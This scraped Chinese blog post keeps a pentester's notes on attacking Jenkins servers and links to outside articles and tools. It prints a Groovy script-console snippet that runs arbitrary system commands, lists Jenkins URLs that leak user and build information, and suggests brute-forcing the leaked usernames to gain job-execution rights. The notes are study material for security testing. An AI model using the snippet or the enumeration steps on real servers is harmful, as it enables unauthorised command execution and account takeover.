好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

关于Jenkins安全测试的一些技巧 - 网站安全 - 自学

 今天mickey牛发来一篇关于hacking Jenkins的文章,受益匪浅,虽然不是很高深的东西,看完几篇相关文章之后记录下要点,为以后做安全测试留下笔记。

 

    文章链接:

 

        http://www.labofapenetrationtester.com/2014/08/script-execution-and-privilege-esc-jenkins. html

 

        http://www.labofapenetrationtester.com/2014/06/hacking-jenkins-servers.html

 

        https://www.pentestgeek.com/2014/06/13/hacking-jenkins-servers-with-no-password/

 

    工具链接:

 

        https://wiki.jenkins-ci.org/display/JENKINS/Terminal+Plugin

 

        https://github.com/samratashok/nishang

 

        http://www.rapid7.com/db/modules/exploit/multi/http/jenkins_script_console

 

        https://wiki.skullsecurity.org/Passwords

 

    文章要点:

 

        看了几篇文章说道了一下几个东西:

 

        1.通过自带的groovy script的解析器可以执行命令

 

  1 2 3 4 5 def sout = new StringBuffer(), serr = new StringBuffer() def proc = '[INSERT COMMAND]'.execute() proc.consumeProcessOutput(sout, serr) proc.waitForOrKill(1000) println "out> $sout err> $serr"

 

 

        2.使用强大的powershell脚本,nishang是一个powershell脚本集

 

        3.当我们没有办法进入console script界面执行脚本的时候可以采用以下方法

 

                a.Jenkins的一下目录泄漏了一写开发用户信息

 

                     List of users:

 

                     http://[jenkinsurl]/asynchPeople/

 

                     List of all builds: 

 

                     http://[jenkinsurl]/view/All/builds

 

                      (Seems to be fixed in the latest version 1.575) 

 

                        List publilcy available content:

 

                        http://[jenkinsurl]/userContent/

 

                        Type of the Operating System: 

 

                        http://[jenkinsurl]/computer/    

 

                b.通过泄漏的用户名爆破得到一些有build job权限的用户,然后执行相关命令

 

 

查看更多关于关于Jenkins安全测试的一些技巧 - 网站安全 - 自学的详细内容...

  阅读:87次